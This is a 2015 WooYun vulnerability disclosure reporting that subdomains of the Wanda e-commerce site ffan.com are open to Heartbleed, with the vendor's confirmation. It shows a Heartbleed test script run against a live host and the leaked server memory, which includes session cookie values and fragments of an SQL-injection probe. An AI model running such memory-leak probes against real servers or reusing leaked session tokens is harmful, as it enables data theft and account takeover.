当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0104638
漏洞标题:
万达电商通用服务配置不当一枚
相关厂商:
万达电商
漏洞作者:
爱上平顶山
提交时间:
2015-03-31 15:09
修复时间:
2015-05-15 15:22
公开时间:
2015-05-15 15:22
漏洞类型:
重要敏感信息泄露
危害等级:
自评Rank:
20
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-03-31: 细节已通知厂商并且等待厂商处理中
2015-03-31: 厂商已经确认,细节仅向厂商公开
2015-04-10: 细节向核心白帽子及相关领域专家公开
2015-04-20: 细节向普通白帽子公开
2015-04-30: 细节向实习白帽子公开
2015-05-15: 细节向公众公开

简要描述:

...

详细说明:

万达电商 ffan.com的所有子域名
www.ffan.com
Heartbleed 漏洞
D:\Python27>python.exe ssltest.py -p "443" jf.ffan.com

Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 804
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 2F 77 64 70 6F 69 6E 74 2F 6A 61 76 61  .@./wdpoint/java
  0010: 73 63 72 69 70 74 2F 35 66 39 39 65 63 37 32 34  script/5f99ec724
  0020: 36 66 31 33 31 66 38 31 62 38 37 34 37 39 33 38  6f131f81b8747938
  0030: 66 31 38 30 62 31 31 2F 77 64 70 6F 69 6E 74 2F  f180b11/wdpoint/
  0040: 70 61 67 65 73 2F 68 65 61 64 65 72 2E 6A 73 20  pages/header.js 
  0050: 48 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74  HTTP/1.1..Accept
  0060: 3A 20 2A 2F 2A 0D 0A 52 65 66 65 72 65 72 3A 20  : */*..Referer: 
  0070: 68 74 74 70 73 3A 2F 2F 6A 66 2E 66 66 61 6E 2E  https://jf.ffan.
  0080: 63 6F 6D 2F 64 65 74 61 69 6C 2F 69 6E 64 65 78  com/detail/index
  0090: 2F 69 64 2F 32 37 30 0D 0A 41 63 63 65 70 74 2D  /id/270..Accept-
  00a0: 4C 61 6E 67 75 61 67 65 3A 20 7A 68 2D 63 6E 0D  Language: zh-cn.
  00b0: 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A  .User-Agent: Moz
  00c0: 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74  illa/4.0 (compat
  00d0: 69 62 6C 65 3B 20 4D 53 49 45 20 38 2E 30 3B 20  ible; MSIE 8.0; 
  00e0: 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 31 3B 20  Windows NT 5.1; 
  00f0: 54 72 69 64 65 6E 74 2F 34 2E 30 3B 20 2E 4E 45  Trident/4.0; .NE
  0100: 54 34 2E 30 43 3B 20 2E 4E 45 54 34 2E 30 45 3B  T4.0C; .NET4.0E;
  0110: 20 2E 4E 45 54 20 43 4C 52 20 32 2E 30 2E 35 30   .NET CLR 2.0.50
  0120: 37 32 37 29 0D 0A 41 63 63 65 70 74 2D 45 6E 63  727)..Accept-Enc
  0130: 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 66  oding: gzip, def
  0140: 6C 61 74 65 0D 0A 48 6F 73 74 3A 20 72 65 73 31  late..Host: res1
  0150: 2E 66 66 61 6E 2E 63 6F 6D 0D 0A 43 6F 6E 6E 65  .ffan.com..Conne
  0160: 63 74 69 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76  ction: Keep-Aliv
  0170: 65 0D 0A 43 6F 6F 6B 69 65 3A 20 53 45 53 53 49  e..Cookie: SESSI
  0180: 4F 4E 49 44 3D 36 39 64 63 66 64 64 39 39 38 64  ONID=69dcfdd998d
  0190: 34 34 38 63 65 38 63 63 31 65 62 64 31 65 66 36  448ce8cc1ebd1ef6
  01a0: 64 30 30 61 35 3B 20 55 5F 55 49 44 3D 36 39 64  d00a5; U_UID=69d
  01b0: 63 66 64 64 39 39 38 64 34 34 38 63 65 38 63 63  cfdd998d448ce8cc
  01c0: 31 65 62 64 31 65 66 36 64 30 30 61 35 3B 20 43  1ebd1ef6d00a5; C
  01d0: 49 54 59 5F 49 44 3D 31 31 30 31 30 30 0D 0A 0D  ITY_ID=110100...
  01e0: 0A 13 65 52 C8 1A B7 1F 31 DB C2 BB B3 68 4B 75  ..eR....1....hKu
  01f0: 84 6F 5F 96 D7 02 02 02 2D 43 AF 29 D6 5B 0E 63  .o_.....-C.).[.c
  0200: FD F2 50 AF A6 6D 66 64 39 DE 88 B5 DB 5B 6C C9  ..P..mfd9....[l.
  0210: CB B3 B1 4F 80 4C 4C 25 32 43 4E 55 4C 4C 25 32  ...O.LL%2CNULL%2
  0220: 43 4E 55 4C 4C 25 32 43 4E 55 4C 4C 25 32 43 4E  CNULL%2CNULL%2CN
  0230: 55 4C 4C 25 32 43 4E 55 4C 4C 25 32 43 4E 55 4C  ULL%2CNULL%2CNUL
  0240: 4C 25 32 43 4E 55 4C 4C 25 32 43 4E 55 4C 4C 25  L%2CNULL%2CNULL%
  0250: 32 43 4E 55 4C 4C 2D 2D 25 32 30 26 73 74 6F 63  2CNULL--%20&stoc
  0260: 6B 3D 33 30 30 26 67 6F 6F 64 73 5F 69 64 3D 31  k=300&goods_id=1
  0270: E5 3B 93 B4 FD D0 58 48 5C 14 25 D3 A3 25 81 CA  .;....XH\.%..%..
  0280: FF B8 A4 F5 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B  ................
  0290: 2A A1 E2 11 B5 39 4F 4A 40 AB 61 DD 10 9D CB 80  *....9OJ@.a.....
  02a0: D8 CC DE 6D D1 78 74 08 0F 43 28 C1 F2 68 BD 06  ...m.xt..C(..h..
  02b0: 3A 7B CB E0 36 6F 64 73 5F 69 64 3D 31 55 FC 45  :{..6ods_id=1U.E
  02c0: 90 D3 BA CC 03 97 BC CD 01 89 EE CC A6 B7 2A A8  ..............*.
  02d0: 20 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E   ...............
  02e0: A7 27 01 29 D3 E3 38 C9 C7 0A 73 1C 4C 83 4E C7  .'.)..8...s.L.N.
  02f0: 37 7D 36 53 B4 5D A8 95 6A A9 A1 B5 8F 04 49 3C  7}6S.]..j.....I<
  0300: 1F 25 E6 8C DE D9 99 45 3F D1 70 21 23 DC 57 42  .%.....E?.p!#.WB
  0310: 6B 82 5F C6 9F 99 C4 A3 1D F7 66 F9 13 F4 C3 C8  k._.......f.....
  0320: 56 5E 13 6C 19 52 2A 0B 86 84 C6 7E 5F 44 67 1F  V^.l.R*....~_Dg.
  0330: 9A C1 53 48 58 73 5F 69 64 3D 31 63 16 93 28 CE  ..SHXs_id=1c..(.
  0340: D9 B9 10 F0 B1 42 10 E1 BD 46 6B A0 98 11 CB 00  .....B...Fk.....
  0350: 21 F2 C2 1B D4 10 38 E8 E9 11 70 6B 9C ED B4 19  !.....8...pk....
  0360: 2D 2B 1A 25 4B CF 4F 77 3E EB 5D 69 D8 C3 C5 C9  -+.%K.Ow>.]i....
  0370: C4 99 1B B0 00 F2 36 B2 C8 66 CB EA 0C FB 5B 50  ......6..f....[P


0.jpg


ok 不一一演示 自测.

漏洞证明:

···

修复方案:

···升级

版权声明:转载请注明来源 爱上平顶山@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-03-31 15:20

厂商回复:

感谢爱上平顶山同学的关注与贡献!马上通知业务整改!

最新状态:

暂无